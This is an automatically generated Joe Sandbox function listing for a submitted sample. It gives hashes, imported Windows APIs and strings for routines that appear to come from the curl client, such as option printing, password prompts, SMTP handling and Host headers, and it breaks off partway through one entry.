Opcode ID: 3ffd24e78324eb47ad2a384c2a7b43ae78404e309768b84b9b838f2f4ed7a7bc
Instruction ID: 8aad4a45c97edaf4579c5cd08aa07018ede6dd33b0ef97bccb1749b53787dca1
Opcode Fuzzy Hash: 3ffd24e78324eb47ad2a384c2a7b43ae78404e309768b84b9b838f2f4ed7a7bc
Instruction Fuzzy Hash: E4A1AD3260868282E764EF29D4407E8B7B0FB49F89F848535DE5D4B798DF78E544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9B431 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 187COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9B437
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9B4E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B57F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B58F
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B5E9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B5FF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B638
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B648
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B660
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9B674

Strings

out of memory, xrefs: 00007FF7F1D9B4D1, 00007FF7F1D9B70B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_strdup
String ID: out of memory
API String ID: 2653869212-49810860
Opcode ID: cebc5a68e8c6c65b57a25f94a9e4135490d1ca1d4d8d76297b4b87e76a2f4a20
Instruction ID: 7981bf1372fa42541ced77e322805e6b7abd113b2b7d0fdb6f8fd45763375e80
Opcode Fuzzy Hash: cebc5a68e8c6c65b57a25f94a9e4135490d1ca1d4d8d76297b4b87e76a2f4a20
Instruction Fuzzy Hash: E6818B6270AB8682EB58EF21904467AB7B4FF44748FC24435CB6D47391EFB8E460D3A4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA1E80 Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 171COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA1F37
__swprintf_l.LIBCMT ref: 00007FF7F1DA1FDD
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F1D9F1CE,?,?,?,?,?,00000000,00000000,00007FF7F1D9F585,?,00000001,?,00000000,00000000), ref: 00007FF7F1DA20BD

Strings

functionpointer, xrefs: 00007FF7F1DA1F72
%ldL, xrefs: 00007FF7F1DA1F26
%s set to a %s, xrefs: 00007FF7F1DA2045
blobpointer, xrefs: 00007FF7F1DA2007
objectpointer, xrefs: 00007FF7F1DA1FA3
(curl_off_t)%I64d, xrefs: 00007FF7F1DA1FCC
curl_easy_setopt(hnd, %s, "%s");, xrefs: 00007FF7F1DA208F
curl_easy_setopt(hnd, %s, %s);, xrefs: 00007FF7F1DA209F

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$free
String ID: %ldL$%s set to a %s$(curl_off_t)%I64d$blobpointer$curl_easy_setopt(hnd, %s, "%s");$curl_easy_setopt(hnd, %s, %s);$functionpointer$objectpointer
API String ID: 1144208884-2831394677
Opcode ID: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction ID: 0cee77d1627ceeeec7b7a6c82c6fa2e45b7ddfbae7546949d45539ac683b5582
Opcode Fuzzy Hash: 0df8022c24536910f2c23727c5bca70af129cce54a723775b81e263de2d2913a
Instruction Fuzzy Hash: CE61D123A0C69245EB20EB11E4406F9A37AAF94B94FD44131DE2D077D6DFBCE546D3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA01E0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 129COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DA02BB
__swprintf_l.LIBCMT ref: 00007FF7F1DA02E4
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA02EE
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA02FC
_getch.API-MS-WIN-CRT-CONIO-L1-1-0 ref: 00007FF7F1DA030B
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA0342
fputs.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1DA0352
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA039A

Strings

%s:%s, xrefs: 00007FF7F1DA037B
Enter %s password for user '%s' on URL #%zu:, xrefs: 00007FF7F1DA02CE
Enter %s password for user '%s':, xrefs: 00007FF7F1DA02AA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_func__swprintf_lfputs$_getchfree
String ID: %s:%s$Enter %s password for user '%s' on URL #%zu:$Enter %s password for user '%s':
API String ID: 768465752-2337704101
Opcode ID: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
Instruction ID: d2151edad03fc004bfbf4cef35477925269f4d6e2381a722c4eafe1b56282561
Opcode Fuzzy Hash: ee29db12ca0665365c94177c0bcdd086137660af24da16c43ee963f43f3fef36
Instruction Fuzzy Hash: 5151F622A09A8282EB51EB11E8402FAB3B4BF84784F844435DEAD077DADFBDD105C390

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAE9C8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 78stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAE9E3
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9EB
__sys_nerr.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAE9FB
__sys_errlist.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEA05
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAEA18
__swprintf_l.LIBCMT ref: 00007FF7F1DAEA5A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAA8
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEAB3
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEABC
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEAC8

Strings

Unknown error %d (%#x), xrefs: 00007FF7F1DAEA4B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast_errno$__swprintf_l__sys_errlist__sys_nerrstrncpy
String ID: Unknown error %d (%#x)
API String ID: 1793456055-2414550090
Opcode ID: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
Instruction ID: 388e5d8f4143cc656496c8eed3bf1a2a754839e28a182a4111d4f571951b50b2
Opcode Fuzzy Hash: 722845d8a610ba7c2703c60a57ff632a872729768dbbd030aded981cdb362460
Instruction Fuzzy Hash: 7F318125A0874385FB18BF21A424239A772BF85B81FC84434C92E077D6DFFDA440E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93AC8 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 75filetimeCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D93AE3
CreateFileA.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D93B0D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D93B1E
GetFileTime.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7F1D93B3A
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7F1D93BBC
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D93BC4
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1D93BCF

Strings

Failed to get filetime: CreateFile failed: GetLastError %u, xrefs: 00007FF7F1D93BD5
Failed to get filetime: GetFileTime failed: GetLastError %u, xrefs: 00007FF7F1D93BA7
Failed to get filetime: underflow, xrefs: 00007FF7F1D93B62

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleTime_strdupfree
String ID: Failed to get filetime: CreateFile failed: GetLastError %u$Failed to get filetime: GetFileTime failed: GetLastError %u$Failed to get filetime: underflow
API String ID: 1016757606-2112902429
Opcode ID: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction ID: f55c61533b23fd016a1350cbf143effa8f91e553a93cb56c527d511858ba01e0
Opcode Fuzzy Hash: 262024fe6c3cde13a0cb35c274e0595f52d58bce0af3a7a284f9fbce9e73a93d
Instruction Fuzzy Hash: EF31B022B0864286EB18AB26E444279E3B1AF44B95FC84531D97E07BD8DFACE50587A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9990C Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 197COMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D9995D
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D999AF
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D999E3
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D99A19
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D99AC1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D99BD9

Strings

--url, xrefs: 00007FF7F1D99B46
option %s: %s, xrefs: 00007FF7F1D99BAA
%s, xrefs: 00007FF7F1D99BC2
2, xrefs: 00007FF7F1D99A46

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$_strdup$malloc
String ID: %s$--url$2$option %s: %s
API String ID: 854390910-1570926479
Opcode ID: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction ID: 3bcda14d3d56f6c11957a556f252277e68c023bb302be9da6304291a62cc514c
Opcode Fuzzy Hash: 1de127588c734ebbed0c8444cb0a0d952fa855a3f5e616187e5108e14bc2b059
Instruction Fuzzy Hash: 94813B62A0D7C285EB69EB1594502B9B7B1EB8578CFC84135DAAD073C5EFBCE441C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCDDAC Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 153COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DCDE42
__swprintf_l.LIBCMT ref: 00007FF7F1DCDED1

Strings

STARTTLS not supported., xrefs: 00007FF7F1DCDFE2
Remote access denied: %d, xrefs: 00007FF7F1DCDE11
Unexpectedly short EHLO response, xrefs: 00007FF7F1DCE001
AUTH, xrefs: 00007FF7F1DCDF38
HELO %s, xrefs: 00007FF7F1DCDE2F
SMTPUTF8, xrefs: 00007FF7F1DCDF12
STARTTLS, xrefs: 00007FF7F1DCDEC0
STARTTLS, xrefs: 00007FF7F1DCDE76

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: AUTH$HELO %s$Remote access denied: %d$SMTPUTF8$STARTTLS$STARTTLS$STARTTLS not supported.$Unexpectedly short EHLO response
API String ID: 1488884202-3893574230
Opcode ID: e9bbbf5d71e5a3d55eadb2fd136bb7f305fa2d28e2ba61e783d744d8b10c1a51
Instruction ID: 25268c46361c134d56a2256e3ba440e9c96c956e580bffa9e69b035913970ac6
Opcode Fuzzy Hash: e9bbbf5d71e5a3d55eadb2fd136bb7f305fa2d28e2ba61e783d744d8b10c1a51
Instruction Fuzzy Hash: 4851CF62F0CAC344EB21AA1598042B9E6B4BB11B94FD40932DA7D076C5DFECE485DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA3968 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 96libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA399D
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7F1DA39AD
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 00007FF7F1DA3A3C
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 00007FF7F1DA3A4D
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 00007FF7F1DA3A5E
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 00007FF7F1DA3A6F
VerSetConditionMask.API-MS-WIN-CORE-SYSINFO-L1-2-0 ref: 00007FF7F1DA3A80
VerifyVersionInfoW.API-MS-WIN-CORE-KERNEL32-LEGACY-L1-1-1 ref: 00007FF7F1DA3AAF

Strings

RtlVerifyVersionInfo, xrefs: 00007FF7F1DA39A6
ntdll, xrefs: 00007FF7F1DA3996

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersion
String ID: RtlVerifyVersionInfo$ntdll
API String ID: 60985879-1699696460
Opcode ID: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
Instruction ID: ef4a455282be6d83339d36ad814a6ee6571415275502718bb381079833053b40
Opcode Fuzzy Hash: a2b51daf946700963a2e2554f2a48f04fa606162fb9106bcf4c5e23bc4cf3138
Instruction Fuzzy Hash: 2A410531A0D24286F728EB25E4243BAA7B1AF89745F844039D96E077D5CFFEE50497E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D93EDC Relevance: 16.6, APIs: 11, Instructions: 137COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F28
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F31
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F41
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F4A
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F5F
ftell.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93F68
_fstat64.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F1D93F80
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93FB3
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D93FE6
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9402C
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D94058

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __acrt_iob_func$_fileno_strdup$_fstat64freeftell
String ID:
API String ID: 1299477587-0
Opcode ID: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction ID: b189a8603a9cb4bb31775584b15af182e567a3b7c9021faed50fe07d35d4d13e
Opcode Fuzzy Hash: 79eaa1cf3bedb6ec6923da53c50699186514a1163730ca21cbdf86dcc8735609
Instruction Fuzzy Hash: AE51F422B0974281FB29BB21A51023AA7B0AF94B91FD14434DE6D477D6EFBCE441C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA3DF8 Relevance: 16.2, APIs: 6, Strings: 3, Instructions: 464stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA3E9F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA3EBD
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4018
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4038
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4135
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,00000001,00007FF7F1DA5142,?,?,?,?,00007FF7F1D91404), ref: 00007FF7F1DA4179

Strings

%s== Info: %.*s, xrefs: 00007FF7F1DA3E0A
I64, xrefs: 00007FF7F1DA3EB3, 00007FF7F1DA402B
I32, xrefs: 00007FF7F1DA3E95, 00007FF7F1DA400B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strncmp$strtol
String ID: %s== Info: %.*s$I32$I64
API String ID: 1111410017-699021961
Opcode ID: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction ID: cd9bb3d227cf07d8ddbeca0afa13b61029c1606fbc8eac41c93e4860384d2fd6
Opcode Fuzzy Hash: 1267a26aac4a315d804af1774754580a0ae1bca02bf288fcad5f4b6862db9ef4
Instruction Fuzzy Hash: 74020732E0850285F768FB28849823CA6B5BF65744FD90639CA6E437D6CFFDA50183E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA20EC Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 141COMMON

Download Yara Rule

APIs

realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA21DA
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA2216
_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DA2230

Strings

empty string within braces, xrefs: 00007FF7F1DA2283
unmatched brace, xrefs: 00007FF7F1DA22D7
unexpected close bracket, xrefs: 00007FF7F1DA229D
range overflow, xrefs: 00007FF7F1DA226E
out of memory, xrefs: 00007FF7F1DA22BA
nested brace, xrefs: 00007FF7F1DA22A6

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _strdupmallocrealloc
String ID: empty string within braces$nested brace$out of memory$range overflow$unexpected close bracket$unmatched brace
API String ID: 178021264-3046722810
Opcode ID: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
Instruction ID: 38d766550b23e8b6c5e51b47a84d929ea0e84b41f6b2c4c28cb1fa1c5d7c4a89
Opcode Fuzzy Hash: 974c668c299ee9774a45e061ea81ad6e394b7ccd718daec43709466e76dff075
Instruction Fuzzy Hash: E951DD32A09B5189E754DF16D488738B3B5FB08B40F868139CE6D03795DFB8E541D3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DC8E9C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 129stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DC9000
_scwprintf.LIBCMT ref: 00007FF7F1DC9014
_scwprintf.LIBCMT ref: 00007FF7F1DC909A
_scwprintf.LIBCMT ref: 00007FF7F1DC90DA

Strings

Host: %s%s%s, xrefs: 00007FF7F1DC9093
Host:, xrefs: 00007FF7F1DC8FF9
Host:%s, xrefs: 00007FF7F1DC900D
Host, xrefs: 00007FF7F1DC8F2D
Host: %s%s%s:%d, xrefs: 00007FF7F1DC90D3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _scwprintf$strcmp
String ID: Host$Host:$Host: %s%s%s$Host: %s%s%s:%d$Host:%s
API String ID: 4079719990-2673429991
Opcode ID: d6afcecbec7d592414ebcba26159cc0638714725e72083c6de9465a5a5341e19
Instruction ID: 5ad6b748525cd7bb2c7a040dfd1b6a3a85c752a556cf33a13620ff7a8cc30202
Opcode Fuzzy Hash: d6afcecbec7d592414ebcba26159cc0638714725e72083c6de9465a5a5341e19
Instruction Fuzzy Hash: 2D519D21A08A8682EB18EB11D5603F8A3B1BF45B85FC44532DA6E4B3D5DFBCE515C3E0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCD69C Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 125stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DCD6ED
__swprintf_l.LIBCMT ref: 00007FF7F1DCD734
__swprintf_l.LIBCMT ref: 00007FF7F1DCD814
__swprintf_l.LIBCMT ref: 00007FF7F1DCD84F

Strings

VRFY %s%s%s%s, xrefs: 00007FF7F1DCD7F2
EXPN, xrefs: 00007FF7F1DCD6E3
SMTPUTF8, xrefs: 00007FF7F1DCD701, 00007FF7F1DCD7D1
%s %s%s, xrefs: 00007FF7F1DCD716
HELP, xrefs: 00007FF7F1DCD837

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
